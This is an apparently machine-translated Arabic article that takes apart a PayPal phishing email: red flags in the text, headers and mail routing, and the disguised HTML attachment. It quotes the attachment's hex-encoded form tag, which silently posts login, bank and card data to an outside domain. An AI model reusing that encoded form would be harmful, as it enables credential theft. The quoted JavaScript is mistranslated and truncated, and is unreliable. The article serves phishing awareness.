الأمن عبر الإنترنت يكسر تشريح البريد الإلكتروني التصيد
في عالم اليوم حيث تكون معلومات كل شخص على الإنترنت ، يعد التصيد الاحتيالي أحد أكثر الهجمات الإلكترونية شيوعًا وتدميراً ، لأنه يمكنك دائمًا تنظيف فيروس ، ولكن إذا سُرقت التفاصيل المصرفية الخاصة بك ، فأنت في ورطة. إليكم انهيار أحد هذه الهجمات التي تلقيناها.
لا تظن أنها مجرد التفاصيل المصرفية الخاصة بك مهمة: بعد كل شيء ، إذا كان شخص ما يسيطر على تسجيل الدخول إلى حسابك فإنه لا يعرف فقط المعلومات الواردة في هذا الحساب ، ولكن الاحتمالات هي أن معلومات تسجيل الدخول نفسها يمكن استخدامها على مختلف الحسابات. وإذا قاموا بتهديد حساب بريدك الإلكتروني ، يمكنهم إعادة تعيين جميع كلمات المرور الأخرى.
لذا بالإضافة إلى الاحتفاظ بكلمات مرور قوية ومتغيرة ، يجب أن تكون دائمًا على اطلاع بالرسائل الإلكترونية الزائفة التي تتنكر على أنها حقيقية. في حين أن معظم محاولات التصيد الاحتيالي تكون هنيئة ، إلا أن بعضها مقنع إلى حد كبير لذا من المهم فهم كيفية التعرف عليها على مستوى سطح الأرض وكذلك كيفية عملها تحت غطاء محرك السيارة..
الصورة من قبل asirap
دراسة ما هو في مرأى من البصر
إن مثالنا على البريد الإلكتروني ، مثل معظم محاولات التصيّد الاحتيالي ، "يُعلمك" بنشاطك على حساب PayPal الخاص بك والذي من شأنه ، في الظروف العادية ، أن يكون مثيراً للقلق. لذلك ، تكمن العبارة التي تحث المستخدم على اتخاذ إجراء في التحقق من / استعادة حسابك من خلال تقديم كل المعلومات الشخصية التي يمكنك التفكير فيها. مرة أخرى ، هذه صيغة صحيحة.
على الرغم من وجود استثناءات بالتأكيد ، إلا أن كل رسائل البريد الإلكتروني الخاصة بالخداع والاحتيال تقريبًا محملة بالأعلام الحمراء مباشرة في الرسالة نفسها. حتى إذا كان النص مقنعًا ، يمكنك عادةً العثور على العديد من الأخطاء المتناثرة في جميع أنحاء نص الرسالة والتي تشير إلى أن الرسالة ليست شرعية.
نص الرسالة
للوهلة الأولى ، هذا هو واحد من رسائل البريد الإلكتروني التصيد أفضل لقد رأيت. لا توجد أخطاء إملائية أو نحوية ويقرأ النص وفقا لما قد تتوقعه. ومع ذلك ، هناك بعض العلامات الحمراء التي يمكنك رؤيتها عند فحص المحتوى عن كثب.
- "Paypal" - الحالة الصحيحة هي "PayPal" (رأس المال P). يمكنك رؤية كل من الصيغ المستخدمة في الرسالة. الشركات متداولة للغاية مع علامتها التجارية ، لذلك فمن المشكوك فيه شيء من هذا القبيل سوف يمر عملية التدقيق.
- "السماح لـ ActiveX" - كم عدد المرات التي شاهدت فيها عملًا شرعيًا مستندًا إلى الويب ، يستخدم حجم Paypal مكونًا خاصًا لا يعمل إلا على متصفح واحد ، خاصةً عندما يدعم متصفحات متعددة؟ بالتأكيد ، في مكان ما هناك بعض الشركات تفعل ذلك ، ولكن هذا هو العلم الاحمر.
- "بشكل آمن" - لاحظ كيف لا تصطف هذه الكلمة في الهامش مع باقي نص الفقرة. حتى إذا قمت بتمديد النافذة أكثر قليلاً ، فلا يتم التفافها أو مساحة بشكل صحيح.
- "Paypal!" - يبدو أن المساحة قبل علامة التعجب تبدو غريبة. مجرد غمزة أخرى وأنا متأكد من أنها لن تكون في البريد الإلكتروني الشرعي.
- "PayPal- Account Update Form.pdf.htm" - لماذا ترفق خدمة Paypal "PDF" خاصة عندما يمكن فقط ربطها بصفحة على موقعها؟ بالإضافة إلى ذلك ، لماذا يحاولون إخفاء ملف HTML كملف PDF؟ هذا هو العلم الأحمر الأكبر منهم جميعا.
رأس الرسالة
عند إلقاء نظرة على رأس الرسالة ، يظهر زوجان من العلامات الحمراء:
- العنوان من العنوان هو [email protected].
- العنوان إلى مفقود. لم أقم بخلع هذا الأمر ، فهو ببساطة ليس جزءًا من رأس الرسالة القياسية. عادة ما تقوم الشركة التي تحمل اسمك بتخصيص البريد الإلكتروني لك.
المرفق
عندما أقوم بفتح المرفق ، يمكنك على الفور رؤية التصميم غير صحيح لأنه يفتقد معلومات النمط. مرة أخرى ، لماذا يقوم PayPal بإرسال نموذج HTML بالبريد الإلكتروني عندما يمكنهم ببساطة الحصول على رابط على موقعهم?
ملحوظة: استخدمنا عارض مرفقات HTML المدمج في Gmail لهذا ، ولكننا نوصي بعدم فتح المرفقات من المحتالين. أبدا. أبدا. انهم في كثير من الأحيان تحتوي على مآثر من شأنها تثبيت حصان طروادة على جهاز الكمبيوتر الخاص بك لسرقة معلومات حسابك.
بالتمرير أكثر قليلاً ، يمكنك أن ترى أن هذا النموذج لا يسأل فقط عن معلومات تسجيل الدخول إلى PayPal ، ولكن أيضًا للحصول على معلومات عن البنوك وبطاقة الائتمان. بعض الصور مكسورة.
من الواضح أن هذه محاولة التصيد الاحتيالي تتم بعد كل شيء بضربة واحدة.
التحليل الفني
في حين أنه يجب أن يكون واضحًا جدًا استنادًا إلى ما هو واضح في أن هذه محاولة تصيد ، فنحن الآن بصدد كسر البنية التقنية للبريد الإلكتروني ونرى ما يمكننا العثور عليه.
المعلومات من المرفق
أول شيء لإلقاء نظرة عليه هو مصدر HTML لنموذج المرفق وهو ما يرسل البيانات إلى الموقع الزائف..
عند عرض المصدر بسرعة ، تظهر جميع الارتباطات صالحة لأنها تشير إلى "paypal.com" أو "paypalobjects.com" وهما شرعيان.
الآن سنلقي نظرة على بعض معلومات الصفحة الأساسية التي يجمعها فايرفوكس في الصفحة.
كما ترى ، يتم سحب بعض الرسومات من النطاقات "blessedtobe.com" و "goodhealthpharmacy.com" و "pic-upload.de" بدلاً من نطاقات PayPal الشرعية.
معلومات من رؤوس البريد الإلكتروني
بعد ذلك سنلقي نظرة على رؤوس رسائل البريد الإلكتروني الخام. يجعل Gmail هذا متاحًا عبر خيار إظهار القائمة الأصلية في الرسالة.
بالنظر إلى معلومات العنوان للرسالة الأصلية ، يمكنك رؤية هذه الرسالة تتكون باستخدام Outlook Express 6. أشك في أن PayPal لديها شخص ما على فريق يرسل كل من هذه الرسائل يدويًا عبر عميل بريد إلكتروني قديم.
الآن بالنظر إلى معلومات التوجيه ، يمكننا رؤية عنوان IP لكل من المرسل وخادم البريد الذي يتم ترحيله.
عنوان IP "المستخدم" هو المرسل الأصلي. عند إجراء بحث سريع على معلومات IP ، يمكننا رؤية عنوان IP للإرسال في ألمانيا.
وعندما ننظر إلى خادم ترحيل البريد (mail.itak.at) ، يمكننا رؤية عنوان IP هذا في ISP ومقره في النمسا. أشك في قيام باي بال بتوجيه رسائل البريد الإلكتروني الخاصة بهم مباشرة من خلال مزود خدمة الإنترنت (ISP) الموجود في النمسا عندما يكون لديهم مزرعة خوادم ضخمة يمكنها التعامل مع هذه المهمة بسهولة.
أين تذهب البيانات?
لذلك قررنا بوضوح أن هذا هو بريد إلكتروني تصيدي وقمت بجمع بعض المعلومات حول مصدر الرسالة ، ولكن ماذا عن مكان إرسال البيانات الخاصة بك?
لرؤية هذا ، يجب علينا أولاً حفظ مرفق HTM في عمل سطح المكتب لدينا وفتحه في محرر نصوص. من خلال التمرير خلاله ، يبدو أن كل شيء سليم إلا عندما نصل إلى كتلة جافا سكريبت مشبوهة.
نكشف عن المصدر الكامل لآخر كتلة من جافا سكريبت ، فإننا نرى:
// حقوق الطبع والنشر © 2005 Voormedia - WWW.VOORMEDIA.COM
فار ط، ص، س = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"، ذ = "؛ ل(ط = 0؛ ط
في أي وقت تشاهد سلسلة كبيرة مختلطة من أحرف وأرقام تبدو ظاهرية مضمنة في كتلة جافا سكريبت ، عادة ما يكون هناك أمر مشبوه. وبالنظر إلى الشفرة ، يتم تعيين المتغير "x" على هذه السلسلة الكبيرة ثم فك تشفيرها في المتغير "y". ثم يتم كتابة النتيجة النهائية للمتغير "y" إلى المستند بتنسيق HTML.
بما أن السلسلة الكبيرة مصنوعة من أرقام 0-9 والأحرف a-f ، فمن المرجح أن يتم ترميزها عبر ASCII بسيط إلى تحويل Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
يترجم إلى:
ليس من قبيل المصادفة أن يفكّر هذا في علامة نموذج HTML صالحة والتي لا ترسل النتائج إلى PayPal ، بل إلى موقع مريب..
بالإضافة إلى ذلك ، عند عرض مصدر HTML الخاص بالنموذج ، سترى أن علامة النموذج هذه غير مرئية لأنها يتم إنشاؤها بشكل حيوي عبر Javascript. هذه طريقة ذكية لإخفاء ما يفعله HTML بالفعل إذا كان شخص ما سيعرض ببساطة المصدر المُنشأ للمرفق (كما فعلنا سابقًا) على عكس فتح المرفق مباشرةً في محرر نصوص.
عند تشغيل whois السريع على الموقع المسيء ، يمكننا أن نرى أن هذا هو نطاق مستضاف في مضيف ويب شائع ، 1and1.
ما يبرز هو أن النطاق يستخدم اسمًا قابلاً للقراءة (بدلاً من شيء مثل "dfh3sjhskjhw.net") وقد تم تسجيل النطاق لمدة 4 سنوات. ولهذا السبب ، أعتقد أنه تم اختراق هذا النطاق واستخدمه بمثابة رهان في محاولة التصيد هذه.
السخرية هي دفاع جيد
عندما يتعلق الأمر بالبقاء آمنًا عبر الإنترنت ، فإنه لا يضر أبداً أن يكون لديك قدر كبير من السخرية.
بينما أنا متأكد من وجود المزيد من الأعلام الحمراء في مثال البريد الإلكتروني ، فإن ما أشرنا إليه أعلاه هو مؤشرات رأيناها بعد بضع دقائق من الفحص. بشكل افتراضي ، إذا كان مستوى سطح البريد الإلكتروني يحاكي نظيره الشرعي 100٪ ، فإن التحليل الفني سيكشف عن طبيعته الحقيقية. هذا هو السبب في أنه من الواردات لتكون قادرة على دراسة كل ما تستطيع وما لا يمكن رؤيته.
